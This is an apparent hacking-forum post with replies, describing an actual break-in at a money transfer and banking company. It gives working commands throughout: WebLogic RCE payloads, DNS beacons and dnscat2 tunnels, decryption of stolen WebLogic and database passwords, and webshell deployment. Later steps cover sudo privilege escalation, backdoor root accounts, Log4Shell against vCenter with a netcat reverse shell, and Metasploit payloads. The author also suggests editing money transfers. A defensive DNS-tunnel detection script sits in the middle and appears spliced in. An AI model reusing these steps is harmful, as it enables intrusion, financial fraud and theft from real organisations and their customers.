• XSS.stack #1 – the first literary magazine from forum users

Article: Banking, money transfer company hacking, and bypassing Sophos firewall (with hard rules) and the IPS/IDS systems

The article is great, but some of its claims are questionable.
If DNS queries in the operating system are blocked by a firewall, or the DNS resolver in use does not work, the answer will not arrive regardless of the operating system. That is, if DNS queries on Windows go unanswered there will be no result, but that does not at all mean the OS is not Windows.
Besides, the nslookup program seems to have a slightly different syntax:
nslookup domain.com IP-dns-server
For example:
nslookup ya.ru 8.8.8.8
nslookup yandex.com 10.152.152.10

The DNS server address can be omitted. In that case the system's server will be used.

The command for determining the OS is not perfect )). But in this case it worked, you got lucky ))
You're completely right and I agree with you. In the tutorial I gave a simple example of finding the operating system via an nslookup query, but there are many ways to identify the operating system. One other way using DNS is to use ping, for example:
For Windows:
ping -n 1 xxzza.xxxx.dnslog.cn
The first step ping does is send a DNS A query to find out the IP address of the DNS name, and as a result we get an entry in the dnslog.cn portal.
And the same thing can be done for Linux:
ping -c 1 dns_host
Another way, if DNS is blocked by the firewall, is to implement Java code inside the vulnerability with a sleep statement.
It will be something like:
Java:
// os.name is reported as "Linux" (capitalised), so compare case-insensitively
if (System.getProperty("os.name").toLowerCase().contains("linux")) {
    try {
        Thread.sleep(10000); // checked exception, so sleep() has to be wrapped
    } catch (InterruptedException e) {
        Thread.currentThread().interrupt();
    }
}
So if the operating system is Linux, the response will be delayed by 10 seconds, and the same thing can be done for Windows 😊
The above code may contain some errors because I'm writing the answer from my phone 😅

Anyway, the way I used in the tutorial was the easiest way.
 
In your article you describe bypassing the Sophos firewall. I'm not familiar with that firewall. But you simply got lucky that the admin who configured the firewall left, besides port 443, ports 53 and 1024:65535 open, and also allowed the ICMP protocol )) And RDP too ))
 
Maybe you misunderstood: only DNS (53) was allowed, nothing except DNS. And allowing DNS is necessary because it is linked to a domain, so it's necessary to identify the IP of the host. I wasn't lucky at all; it was an extremely hard rule set that blocks EVERYTHING. I created my own tunnels from zero.
 
Clowns? Why?

Great article, off to study it. Yasha, thanks for the work!
Haven't you seen that legendary video where NSD sat there looking intimidated, with the cop-like mug of a Vor v Zakone, and in a stuttering voice explained the Skype flood system they had bolted onto Gozi and were offering for rent? And both of them tried to prove to Maza what, damn it, successful cybercriminals they are?


Sorry for the off-topic.
 
 
Hello guys,
This is my first post in the forum and in the contest, so I wanted to make it something good.

Sorry, I am writing this article in English, but if you have any question or anything is unclear, don't hesitate to ask me and I will make it clear for you.

Abstract

In this article I am going to show you how you can bypass a Sophos firewall that blocks everything (TCP, UDP, ICMP) and has advanced IPS and IDS systems that detect any kind of malware. Moreover, I will show you how you can go deep into the network, get a stable connection with the servers and hosts inside it, expose more networks and get a reverse shell. All in all, you will learn how to prepare your hacking stations inside the target's network, how to go from no privileges at all to full access to EVERYTHING (Oracle DBs, vCenter, DC admin), and how to persist your presence in the network for a long time.

Introduction

I always try to filter the results that come from my bot scans and divide them into two categories: one for installing a cryptocurrency miner, and the other for more investigation based on the domains or subdomains that exist in the TLS certs and on the presence of a "middle proxy, firewall, IDS, IPS, etc." Then, when I have free time, I start looking for a big fish from the second category to hunt down. The target that I am going to use to explain the techniques is a money transfer and banking company, which got my attention because I had difficulties at every step I took, and that is what made me think this experience would be something good to share with you.

When I came to check which vulnerability affects this company, it turned out that one of its servers is affected by the WebLogic unauthenticated RCE CVE-2020-14882, which gives us the ability to execute Java code in the memory of the Java process inside the server.

To make sure that we are able to execute Java code, I executed code that sends a DNS query to my domain while listening with tcpdump for what comes in.

sudo tcpdump -i eth0 udp port 53

View attachment 37106
View attachment 37107
Good, we got the desired query, which means that our Java code got executed successfully.

Note: you can identify whether the server is Windows or not by sending the following command

cmd.exe /c nslookup xxxxx.domain.com

If we get results, it means it's Windows; if not, it's Linux.

You can use dnslog.cn for this task, and we will use it later in this tutorial.

Now let's suppose that I don't know whether the server has a middleware (firewall, proxy or load balancer) in front of it or not. There is a simple technique that I always use for such things: if there is a firewall I will not be able to get a reverse shell of any kind (TCP, HTTP, HTTPS), but when it's a proxy or load balancer there is a chance that I can get a reverse HTTP connection. Simple, right?

So I tried reverse TCP, HTTP and HTTPS beacons, but without result. I tried common ports (80, 8080, 443, 8443) that might be allowed, but without any result either :( Moreover, I tried to ping the server to check if there is a possibility to get a ping back, but without any result too, and that was the first problem that I faced (NO REVERSE CONNECTION AT ALL). This means it's a firewall with rules that block all kinds of reverse connections (TCP, UDP, ICMP), so what is left for us? Yes, DNS :) a reverse connection over DNS.

So I created a DNS beacon that connects back to my server, made the payload a PowerShell command and executed it, but without any result :(

At that time I knew that I was facing an IPS/IDS system. For those who don't know what an IPS (Intrusion Prevention System) and an IDS (Intrusion Detection System) are: in simple words, they are an antivirus installed in the firewall to prevent any kind of malware attack, on top of the main firewall functionality. I am going to show later how I figured out that we are dealing with Sophos. That is really bad; we are going to have a lot of work to do. 😆😆😆😆

Let's get started

Since the firewall blocks everything from going out, there is a great possibility that the servers behind it are NOT UP TO DATE, which means there are many unfixed bugs, and their antiviruses are NOT UP TO DATE as well, because the firewall also blocks them from reaching the updates. This means that if we can bypass the IPS/IDS systems and upload our DNS backdoor, we will not need to encrypt it.

I spent some time thinking and trying to upload a file's bytes in chunks using an inline technique, but the problem I faced is that this vulnerability launches more than one process when it gets executed, which means that if I execute
Code:
echo|set /p="">beacon.hex
echo|set /p="4d5a900003000000040000000001000000040000000000000cfd775b0da70d420f863a3cd8524d475f8052f0e47533">>beacon.hex
the second line will be executed and its bytes appended to beacon.hex more than once, which means the file will be corrupted.

Fortunately, our exploit is RCE, which means we can write our own code to write the file without any errors. I used the java.io.RandomAccessFile class to do so.
Java:
import java.io.IOException;
import java.nio.file.Paths;
import java.nio.file.StandardOpenOption;

// Reads the file x in chunks of dbyte bytes and appends each chunk, Base64-encoded,
// together with the file offset reached after it, as one line of C:\outfile.txt
static void acf(String x, int dbyte) throws IOException {
    long cp = 0;
    java.io.RandomAccessFile acf = new java.io.RandomAccessFile(x, "r");
    while (acf.length() != cp) {
        byte[] temp;
        int sz = (int) (acf.length() - cp);
        if (sz >= dbyte)
            temp = new byte[dbyte];
        else
            temp = new byte[sz];
        acf.seek(cp);
        acf.readFully(temp);          // read exactly temp.length bytes
        cp = acf.getFilePointer();
        try {
            // encode the raw bytes directly: round-tripping binary data through a String
            // (the original bs64(new String(temp)) helper) corrupts bytes that are not
            // valid in the platform charset
            String s = java.util.Base64.getEncoder().encodeToString(temp) + " --> " + cp + "\n";
            java.nio.file.Files.write(Paths.get("C:\\outfile.txt"), s.getBytes(),
                    StandardOpenOption.CREATE, StandardOpenOption.APPEND);
        } catch (IOException e) {
            //exception handling left as an exercise for the reader
            System.out.println("Error " + e.toString());
        }
    }
    acf.close();
}

The acf() method will read our backdoor, encode it and output the encoded bytes as lines into C:\outfile.txt. Now I will edit the exploit to read the lines and add them to a remote file in the vulnerable system, writing each chunk at the same offset using the seek() method. For test purposes I made a method to be run locally on my machine together with the previous one.

Java:
// Writes the Base64 line d, decoded back to raw bytes, at offset pos of file p
static void wacf(String p, long pos, String d) throws IOException {
    // in the exploit request the path p itself is passed Base64-encoded
    java.io.RandomAccessFile wf = new java.io.RandomAccessFile(p, "rw");
    wf.seek(pos);
    wf.write(java.util.Base64.getDecoder().decode(d)); // write the decoded bytes as-is
    wf.close();
}

This is the original exploit
_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"java.lang.Runtime.getRuntime().exec('"+cmd+"');\");"

We will add the wacf() method's code to the exploit, and we must pay attention to the quotes 🤣
Java:
_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"java.io.RandomAccessFile wf = new java.io.RandomAccessFile(new String(java.util.Base64.getDecoder().decode(\"name_of_file_in_base64String\")),\"rw\");wf.seek(0);wf.write(new String(java.util.Base64.getDecoder().decode(\"base64_line_here\")).getBytes());java.lang.Runtime.getRuntime().exec('nslookup wrote.pop457.dnslog.cn')\");"

Pass to the seek() method the byte position in the file where the chunk should be written: for example, if the first line after decoding the Base64 was 100 bytes, the seek value of the next request will be seek(100), and so on.

Replace base64_line_here with the line found in C:\outfile.txt that the acf() method created.

Replace wrote.pop457.dnslog.cn with your DNS name for reporting.

I launched the exploit, uploaded the lines manually, monitored the responses from the server, and things went well: the file got uploaded. Of course, I used a DNS beacon to get C2 in Cobalt Strike, which means a domain name has been used; if you don't have one, you can create a free one from freenom.com.

Sophos IPS/IDS Firewall Bypassing

Let's now launch our DNS beacon

exploit.py https://target.com "cmd.exe /c start orcl_domain.exe"

View attachment 37108

As you can see in the figure above, we could bypass the firewall and get a reverse DNS beacon, but with low-level user privileges, and the connection is so unstable (maybe because the IPS drops some of Cobalt Strike's packets) that we cannot do any tunneling over DNS. Now we have to think of an alternative way to tunnel our connections to the servers.

Since we are in a JSP environment we can implement something a lot better than DNS tunneling, which is tunneling over HTTP using the amazing tool A Black Path Toward the Sun (ABPTTS). You can get the tool from the main repo on GitHub -> https://github.com/nccgroup/ABPTTS

To implement such tunneling we will need to deploy the ABPTTS webshell on the server, and to do so we will need the password of the WebLogic console, so we will need to decrypt the passwords that exist in the boot.properties file. For that we need an interactive shell to help us execute the commands in the WLST shell. As a temporary solution we can use dnscat2; yes, it's slow, but we will only need it to crack the passwords that exist in the WebLogic server.
You can download it from the following URL

https://downloads.skullsecurity.org/dnscat2/

I downloaded dnscat2-v0.07-server.zip for the server to listen for the traffic and dnscat2-v0.07-client-win32.zip for Windows.

Note: the password to unzip the files is "password"

Now let's upload the client to the server as dc.exe and then execute the following command

exploit.py https://target.com "cmd.exe /c dc --dns domain=domain_here,type=TXT"

And here are some figures of the connection
View attachment 37109
View attachment 37110
View attachment 37111

To interact with a window we type

window -i WINDOW_ID_HERE

To exit from a window we press Ctrl+Z

To get an interactive shell we type shell; after that it will open a new window for us, and we interact with it by window -i window_id_here

Please note that the connection is not stable, so you will need to launch the client more than once, but this is our best choice for now.
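From the defender's side, both DNS channels used so far (the Cobalt Strike DNS beacon and the dnscat2 TXT tunnel) leave the same footprint in a resolver log: one client sends many queries to a single domain, each carrying a different long, high-entropy leftmost label, mostly of TXT type. The following Python is an added example, not code from the article or from either tool, that scores resolver log lines on exactly that shape. The log format (time, client, qtype, qname), the sample lines, the domain c2-placeholder.example and the thresholds are all constructed assumptions for the demonstration.

```python
"""Spot DNS beacon / tunnel traffic in resolver query logs.

Groups queries by (client, registered domain) and flags groups whose leftmost
labels look like encoded data: many distinct labels, long, high entropy.
"""
import math
from collections import defaultdict

# Constructed sample resolver log (not from the article). Fields: time client qtype qname
# c2-placeholder.example stands in for an attacker-controlled domain.
SAMPLE_LOG = """\
2021-04-30T10:00:01 10.10.5.20 A www.example.com
2021-04-30T10:00:02 10.10.5.20 A mail.example.com
2021-04-30T10:00:03 10.10.5.20 A cdn.example.com
2021-04-30T10:00:04 10.10.5.20 A www.example.com
2021-04-30T10:00:05 10.10.5.20 TXT 3a7f0e9c1b5d8246f0e1d2c3b4a59687.c2-placeholder.example
2021-04-30T10:00:06 10.10.5.20 TXT 7e2a9f4c0d1b53866c5a8e1f3b9d7024.c2-placeholder.example
2021-04-30T10:00:07 10.10.5.20 TXT b4d9e2f7a1c608350f1e2d3c4b5a6978.c2-placeholder.example
2021-04-30T10:00:08 10.10.5.20 TXT c0a1b2d3e4f596875e3d1c9b7a8f6420.c2-placeholder.example
2021-04-30T10:00:09 10.10.5.20 TXT 8f6e4d2c0b9a75311357902468acebdf.c2-placeholder.example
2021-04-30T10:00:10 10.10.5.20 TXT d7c5b3a1f9e806422468ace0bdf13579.c2-placeholder.example
"""


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of s (0.0 for an empty or single-symbol string)."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname: str) -> str:
    """Last two labels of a name (assumption: no public-suffix list is consulted)."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def parse_line(line: str):
    """Parse one 'time client qtype qname' log line; None for malformed lines."""
    parts = line.split()
    if len(parts) != 4:
        return None
    ts, client, qtype, qname = parts
    return {"ts": ts, "client": client, "qtype": qtype.upper(),
            "qname": qname.rstrip(".").lower()}


def detect_dns_tunnels(log_text: str, min_distinct=5, min_entropy=3.0, min_label_len=20):
    """One finding per (client, domain) group with at least min_distinct distinct
    leftmost labels whose mean length >= min_label_len and mean entropy >=
    min_entropy bits. The threshold defaults are assumptions, not tuned values."""
    groups = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            groups[(rec["client"], registered_domain(rec["qname"]))].append(rec)

    findings = []
    for (client, domain), recs in groups.items():
        labels = [r["qname"].split(".")[0] for r in recs]
        if len(set(labels)) < min_distinct:
            continue
        mean_len = sum(len(l) for l in labels) / len(labels)
        mean_ent = sum(shannon_entropy(l) for l in labels) / len(labels)
        if mean_len >= min_label_len and mean_ent >= min_entropy:
            findings.append({
                "client": client, "domain": domain, "queries": len(recs),
                "distinct_labels": len(set(labels)),
                "mean_label_len": mean_len, "mean_entropy": mean_ent,
                "txt_share": sum(r["qtype"] == "TXT" for r in recs) / len(recs),
            })
    return findings


if __name__ == "__main__":
    for f in detect_dns_tunnels(SAMPLE_LOG):
        print(f)
```

Run against the constructed log, only the c2-placeholder.example group is reported: six distinct 32-character labels with 4 bits of entropy each and a 100% TXT share, while the example.com group has only three short, low-entropy labels and is skipped. The distinct-label count matters more than raw volume: a busy but legitimate host repeats the same few names, whereas a tunnel almost never repeats a label.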

Now we will extract the login credentials for the console by executing

> type servers\AdminServer\security\boot.properties

These are the login credentials before decryption
Code:
# Generated by Configuration Wizard on Thu Apr 29 22:33:24 AST 2021
username={AES}Re4nDw1n7PjHF+7bd3pqqLf/mxV0BpzOWn1AyHQ1ovo=
password={AES}DSkOz1wN1OewOiqRN+KWFe1YCttgm105glJCmXdCd3o=

Now, by executing the following commands, I could extract the username and the password for the login console

Code:
> cd C:\Oracle\Middleware\Oracle_Home\wlserver\common\bin
> wlst.bat
> domain = "C:/Oracle/Middleware/Oracle_Home/user_projects/domains/base_domain"
> service = weblogic.security.internal.SerializedSystemIni.getEncryptionService(domain)
> encryption = weblogic.security.internal.encryption.ClearOrEncryptedService(service)
> encryption.decrypt("{AES}Re4nDw1n7PjHF+7bd3pqqLf/mxV0BpzOWn1AyHQ1ovo=")
'wallet'
> encryption.decrypt("{AES}DSkOz1wN1OewOiqRN+KWFe1YCttgm105glJCmXdCd3o=")
' walletAdmin1'
domain: the path of the WebLogic domain

service: creates an encryption service and stores it in the variable service

encryption: gets an AES decryption object and stores it in the encryption variable

encryption.decrypt() --> calls the decryption function and passes it the AES value

Before logging in and closing the dnscat2 tunnel, we need to crack the database passwords. The passwords of the databases exist in files called data sources; these files are under the path

C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain1\config\jdbc

I found some XML files that contain login credentials for the database servers, and this is one of them
XML:
<?xml version='1.0' encoding='UTF-8'?>
<jdbc-data-source xmlns="http://xmlns.oracle.com/weblogic/jdbc-data-source" xmlns:sec="http://xmlns.oracle.com/weblogic/security" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wls="http://xmlns.oracle.com/weblogic/security/wls" xsi:schemaLocation="http://xmlns.oracle.com/weblogic/jdbc-data-source http://xmlns.oracle.com/weblogic/jdbc-data-source/1.0/jdbc-data-source.xsd">
  <name>JDBC GridLink Data Source-0</name>
  <datasource-type>AGL</datasource-type>
  <jdbc-driver-params>
    <url>jdbc:oracle:thin:@(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=172.16.33.33)(PORT=1533)))(CONNECT_DATA=(SERVICE_NAME=walletDB)))</url>
    <driver-name>oracle.jdbc.OracleDriver</driver-name>
    <properties>
      <property>
        <name>user</name>
        <value>wallet</value>
      </property>
    </properties>
    <password-encrypted>{AES}3kvyGZTpFd5gIxzRAGIjDNmbKTIhLhAARvhYv+ld63w=</password-encrypted>
  </jdbc-driver-params>
  <jdbc-connection-pool-params>
    <initial-capacity>100</initial-capacity>
    <max-capacity>3500</max-capacity>
    <min-capacity>1</min-capacity>
    <shrink-frequency-seconds>900</shrink-frequency-seconds>
    <highest-num-waiters>2147483647</highest-num-waiters>
    <connection-creation-retry-frequency-seconds>0</connection-creation-retry-frequency-seconds>
    <connection-reserve-timeout-seconds>10</connection-reserve-timeout-seconds>
    <test-frequency-seconds>120</test-frequency-seconds>
    <test-connections-on-reserve>false</test-connections-on-reserve>
    <ignore-in-use-connections-enabled>true</ignore-in-use-connections-enabled>
    <inactive-connection-timeout-seconds>120</inactive-connection-timeout-seconds>
    <test-table-name>SQL ISVALID</test-table-name>
    <login-delay-seconds>0</login-delay-seconds>
    <statement-cache-size>100</statement-cache-size>
    <statement-cache-type>LRU</statement-cache-type>
    <remove-infected-connections>true</remove-infected-connections>
    <seconds-to-trust-an-idle-pool-connection>10</seconds-to-trust-an-idle-pool-connection>
    <statement-timeout>-1</statement-timeout>
    <pinned-to-thread>false</pinned-to-thread>
    <wrap-types>true</wrap-types>
    <connection-harvest-max-count>1</connection-harvest-max-count>
    <connection-harvest-trigger-count>-1</connection-harvest-trigger-count>
    <count-of-test-failures-till-flush>2</count-of-test-failures-till-flush>
    <count-of-refresh-failures-till-disable>2</count-of-refresh-failures-till-disable>
  </jdbc-connection-pool-params>
  <jdbc-data-source-params>
    <jndi-name>jdbc/restDS</jndi-name>
    <global-transactions-protocol>OnePhaseCommit</global-transactions-protocol>
  </jdbc-data-source-params>
  <jdbc-oracle-params>
    <fan-enabled>false</fan-enabled>
    <ons-node-list></ons-node-list>
    <ons-wallet-file></ons-wallet-file>
    <active-gridlink>true</active-gridlink>
  </jdbc-oracle-params>
</jdbc-data-source>
Between the password-encrypted tags we can find the AES-encrypted password that is used to connect to the database on the remote server "172.16.33.33"

Dbname = walletDB
Dbuser = wallet
Host = 172.16.33.33
Encrypted password = {AES}3kvyGZTpFd5gIxzRAGIjDNmbKTIhLhAARvhYv+ld63w=

Now let's execute the same decrypting command in the WLST shell
Code:
> encryption.decrypt("{AES}3kvyGZTpFd5gIxzRAGIjDNmbKTIhLhAARvhYv+ld63w=")
'wallet_123'
Now we have all the login credentials for both the database server of the wallet application and the WebLogic console. Now let's try to log in

View attachment 37112

Finally 😄😄 we logged in; that was hard and exhausting.
Now it's time for the great tool "A Black Path Toward the Sun".
Something to mention about this tool: it supports tunneling over HTTP for both ASPX and JSP.
Now run the following commands in the terminal

Bash:
git clone https://github.com/nccgroup/ABPTTS.git
cd ABPTTS
python abpttsfactory.py -o webshell
Now we have webshells (aspx, jsp and war) in the webshell folder. We are interested right now in the war shell, because WebLogic only deploys war files as web apps

ls -lah webshell
View attachment 37113
We will upload philanderersRedeemer.war via the WebLogic console

Deploying an application in WebLogic is pretty simple; just follow these steps:

  • Click on Lock & Edit
  • Click on Deployments
  • Click on Install
  • Click on Upload your file(s)
  • Browse for the webshell and select it, then ignore everything else and click Next
  • Click Next
  • Next again
  • Remember the name that appears in the Name field
  • Finish
Under Summary of Deployments click the Control tab, then under Deployments select your file and click Start -> Servicing all requests; finally click Release Configuration.

That's it 😆

Now my ABPTTS shell URL is https://target.com/abpts/philanderersRedeemer.jsp

Now we have the ability to tunnel over HTTP, which is much faster than DNS, which means we have bypassed the firewall and the IPS/IDS.
Tunnel over HTTP

ABPTTS provides an easy way to tunnel the connections with a simple command line

python abpttsclient.py -c [config file] -u [abptts webshell] -f [local_IP_to_listen]:[local_port]/[remote_IP_to_connect]:[remote_port]

Now we will use the database login creds to hack the Oracle server, NOT only the database, and gain root privileges on the server, then connect to the databases inside the server and do whatever we want, like changing transaction numbers, reusing an old money transfer by editing it in the tables, and anything else that comes to mind.

So how will we take over the Oracle server using the Oracle database login creds? We will use a tool called Oracle Database Attacking Tool; this tool is amazing, it checks all the available exploits and privileges for the database user and gives us a report.

So first let's tunnel over HTTP using the following command

python abpttsclient.py -c webshell/config.txt -u https://target.com/abpts/philanderersRedeemer.jsp -f 127.0.0.1:1521/172.16.33.33:1533 -v

127.0.0.1:1521 --> loopback interface and local port to listen on, on our attacking machine

172.16.33.33:1533 --> remote IP of the Oracle server and its remote listening port

Easy, right!!! 🙂

If we check the listening connections on our machine now, we will notice that python is listening on 127.0.0.1:1521

netstat -nltp
View attachment 37115
Break into Database server

To hack an Oracle database server, we need to check the privileges that the DB user has and use them in our favor. To do this we will use Oracle Database Attacking Tool (ODAT); this amazing tool will do all the hard work for us :)

This tool runs many attacks against an Oracle server and gives a nice, sorted result. You can download it from the following URL

https://github.com/quentinhardy/odat/releases/download/5.1.1/odat-linux-libc2.17-x86_64.tar.gz

Now let's launch the attack against the 172.16.33.33 server, whose database credentials we have.

Execute the following command:
Bash:
odat all -s 127.0.0.1 -U wallet -P wallet_123 -d walletDB
all --> test for everything

127.0.0.1 --> our listening loopback interface

-U for the user name

-P for the password

-d for the database

View attachment 37116

The OK means we can use that library for exploiting. For me, the UTL_FILE library always works fine, especially when the Oracle server is Linux. To check if it's Linux we need to tunnel SSH and try to log in
Bash:
python abpttsclient.py -c webshell/config.txt -u https://target.com/abpts/philanderersRedeemer.jsp -f 127.0.0.1:1521/172.16.33.33:1533 -f 127.0.0.1:2222/172.16.33.33:22 -v
ssh 127.0.0.1 -p 2222

View attachment 37117
Linux lol :D

The utlfile module is capable of doing almost everything with files on the server, such as uploading a file from our machine to the server, downloading a file from the server to our machine and, of course, deleting a file. To see the module's functionality just type odat utlfile -h.

Now let's upload an SSH key to the Oracle server at the path /home/oracle/.ssh/authorized_keys and connect to it. If you haven't created an SSH key before, you can do it with the ssh-keygen tool, which is present by default on Linux.

Anyway, I have one in the home directory of my Kali Linux, so I will upload it to the Oracle server; please see the following figure.
View attachment 37118
So now our SSH key is in the /home/oracle/.ssh folder as authorized_keys, which means we can connect to the Oracle server without providing the password by executing the following command
ssh oracle@127.0.0.1 -p 2222

View attachment 37119
Bingo 😎 we are inside the Oracle server

Now our connection with the Oracle server looks like this
View attachment 37120

Now what's next?

Privilege escalation

For the past two years, Linux has been suffering from privilege escalation vulnerabilities such as CVE-2021-3156, PwnKit, Dirty Pipe and Nimbuspwn. I will check for the first one by using this one-liner: sudoedit -s '\' `perl -e 'print "A" x 65536'`
View attachment 37121
It's vulnerable; the exploit is available on GitHub -> https://github.com/worawit/CVE-2021-3156

Let's upload the exploit using the scp command
scp -P2222 -i ~/.ssh/id_rsa CVE-2021-3156.zip oracle@127.0.0.1:/tmp
View attachment 37122
Bash:
unzip CVE-2021-3156.zip

cd CVE-2021-3156-main/

python exploit_defaults_mailer.py
View attachment 37123

Let's run /tmp/sshell
View attachment 37124


Now we have root on a Linux system, which means we can use this system as our hacking station inside the network and execute any kind of attack from it or scan the network.
But now I will create a user with root privileges on the server to make things easier for us.
Execute the following commands
Bash:
useradd --no-create-home sql
usermod -aG sudo sql
passwd sql   # then set the password for the user sql

Now we can browse all the databases that exist on this server without any limitation, so let's connect to the Oracle database

SQL:
sqlplus / as sysdba
SELECT NAME FROM v$database;
SELECT table_name FROM all_tables WHERE owner = 'WALLET'; -- we will get the tables of the user WALLET
View attachment 37125
Now we can use INSERT or UPDATE statements to manipulate the clients' transactions. However, we will first need to study and analyze the database tables and columns to understand which columns or tables to edit, and this will take some time, so I will stop here and move to the next section.

Going deep into the network
We need to move from this machine to others so we can reach the domain controller, because we landed on a machine with low user privileges and outside the company's MS domain. Whenever I get a foothold in a network, the first thing I do is look for the vCenter: it's often connected to almost every interface in the network or has access to every network range, so it's a good place to start, and it will help us a lot in discovering the network without any filters. We will use the masscan tool to scan the range 192.168.0.0/16 for port 443, which ESXi, vCenter and many other hypervisors listen on.
So we transfer masscan to the Oracle server from our machine, but we will use the rsync command for big files in case the network gets interrupted, so we can resume the transfer from where we stopped.
Code:
rsync -P -e "ssh -p 2222" masscan sql@127.0.0.1:/tmp
This command will transfer masscan to the /tmp directory on the Oracle server.
Now let's start scanning
Bash:
cd /tmp
chmod +x masscan
./masscan -p 443 192.168.0.0/16 --rate=10000 >> 443.txt

--rate = number of packets per second; it's not recommended to increase it beyond 100000, because you could be disconnected from the host and the result of the scan will not be accurate (you may miss some hosts).
Now we have the results stored in the 443.txt file, and we want to check whether these IPs belong to ESXi or vCenter. I made a simple Python script to do so; I will attach it with the files at the end of the article.
View attachment 37126
192.168.0.81 is vCenter. We found it.
Let's check if the vCenter is vulnerable to the Log4Shell vulnerability. I made a Python script to do so; it will be in the attachments as well. We will transfer it to the Oracle server the same way we did with masscan.
Code:
rsync -P -e "ssh -p 2222" vcenter.py sql@127.0.0.1:/tmp

View attachment 37127

The result is:

View attachment 37128
And it's vulnerable 🤣🤣


Break into vCenter

Now, to exploit the vCenter, we will need to transfer rogue-jndi; you can get it on GitHub.

On our Kali Linux we will execute the following command to get it.

git clone https://github.com/veracode-research/rogue-jndi && cd rogue-jndi && mvn package

You may need to install mvn (Maven) in case it's not installed on your Kali machine. Then we will zip the target folder

zip target.zip -r target

then transfer it to the Oracle server

Code:
rsync -P -e "ssh -p 2222" target.zip sql@127.0.0.1:/tmp

The exploitation idea is to get a reverse connection from the vCenter to our cloud server or to the Oracle server.

The exploitation steps are:

  • Provide rogue-jndi with the command to be executed on the vCenter, the LDAP listening port and the HTTP port; you can use the default ports
  • Execute the Python exploit which we have already transferred to the Oracle server
You can read more about the exploit here

https://www.sprocketsecurity.com/blog/how-to-exploit-log4j-vulnerabilities-in-vmware-vcenter

By default vCenter comes with netcat, so we can use it to get a reverse shell either to our cloud server or to the Oracle server.

I tried to get a reverse shell to my cloud server but it failed, so I got a reverse shell to the Oracle server.

Run the exploit, then change the value inside the vcenter.py script

java -jar target/RogueJndi-1.1.jar -c "nc 172.16.33.33 443 -e /bin/bash"

nano vcenter.py

View attachment 37129

Save and run the exploit

python vcenter.py https://192.168.0.81

View attachment 37130
We got a reverse shell, so let's execute
Bash:
id
/bin/bash -i

Now it's time for me to show you that we have been dealing with a Sophos firewall from the beginning: I tried to send a GET request to xss.pro from the vCenter host, and that is the response
View attachment 37131
Now our connection to the vCenter looks like this
View attachment 37132


Deeper and deeper

As I mentioned earlier, the vCenter host often has access to almost all ranges in the network, because many running servers are virtual and in many cases they need to be linked to the vCenter to be managed. So we will try to scan the class A network, 10.0.0.0/8, from the vCenter using masscan, but first we need to create a user with root privileges like we did on the Oracle server.

useradd --no-create-home sql --shell /bin/bash

usermod -aG sudo sql

passwd sql   # then set the password for the user sql

Now we will make a tunnel directly from 192.168.0.28 --> 192.168.0.81

python abpttsclient.py -c webshell/config.txt -u https://target.com/abpts/philanderersRedeemer.jsp -f 127.0.0.1:1521/172.16.33.33:1533 -f 127.0.0.1:2222/172.16.33.33:22 -f 127.0.0.1:3333/192.168.0.81:22 -v

View attachment 37133

So let's log in via SSH

View attachment 37134

Now let's scan the class A private range, and in case we don't get anything good we will scan class B and class C. I will focus on services like HTTP and HTTPS on the following ports

443,8443,80,8080,8081,8082,8083,7001,7002,9001,9002

After we look for such ports, we will use zgrab2 to look for backend JSP servers like Tomcat, JBoss, WebLogic, Jenkins or any server whose response contains JSESSIONID, so we can try to exploit them using the Log4Shell exploit like we did with the vCenter.
Before we begin I want to mention something very important about the combination of masscan and zgrab2. These two tools are extremely fast, which means their results are not accurate. One more thing about zgrab2: this tool does not always validate the TLS/SSL certificate. I tried to find what the problem is, but with no luck, so if any of you guys has any idea it would be nice if you posted the solution in the comments :) Anyway, zgrab2 is still strong and effective.

Now let's get root

sudo /bin/bash

Then type the password

And in another terminal let's transfer masscan
Bash:
rsync -P -e "ssh -p 3333" masscan sql@127.0.0.1:/tmp
In the ssh terminal
cd /tmp
mkdir .xx
mv masscan .xx
cd .xx
chmod +x masscan
./masscan -p 443 10.0.0.0/8 --rate=100000 >> 443.txt

View attachment 37135
We filter the output using the command

cat 443.txt | cut -d ' ' -f6 >> 443_filtered.txt

Now we will use zgrab2 to send GET requests on port 443
View attachment 37136
Now it's time to filter the output produced by zgrab2. Since we have 169 hosts, it would be very hard to sort and filter the output by hand and look for the services and scripts, so I created a simple shell script to do the job for us; it will be in the attachments.

Let's transfer it to the server

Code:
rsync -P -e "ssh -p 3333" detect.sh.zip sql@127.0.0.1:/tmp

And in the ssh terminal

Bash:
mv ../detect.sh.zip .
unzip detect.sh.zip
chmod +x detect.sh
./detect.sh 443.csv  # 443.csv is the zgrab2 result
ls -lah out/
and the results are:
View attachment 37137
As you can see, we have results in the JSESSIONID txt file, tomcat.txt, vmware horizon and wordpress. We all know that VMware Horizon is vulnerable to Log4Shell, and I am sure we would find more on Tomcat and many more in the JSESSIONID list, and we have not scanned the other ports yet, we only scanned port 443.

View attachment 37138

Let's check whether these hosts are vulnerable to Log4Shell.
The exploit is:
curl -vv -H "Accept-Language: \${jndi:ldap://DNSHOST}" --insecure https://target_ip/portal/info.jsp
View attachment 37139
Both of them are vulnerable.

Very well, now let's exploit one of them the same way we did with vCenter, but first we have to try to get a reverse shell to our cloud.

This time when I tried to get a reverse shell to the cloud, it worked🤣😍😍😍
So let's create a meterpreter payload
Bash:
msf6 > use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set target 2
target => 2
msf6 exploit(multi/script/web_delivery) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set lport 8444
lport => 8444
msf6 exploit(multi/script/web_delivery) > set lhost eth0
lhost => eth0
msf6 exploit(multi/script/web_delivery) > run
and run the rogue-jndi exploit
java -jar target/RogueJndi-1.1.jar -l 8443 -p 8081 -c "powershell payload"

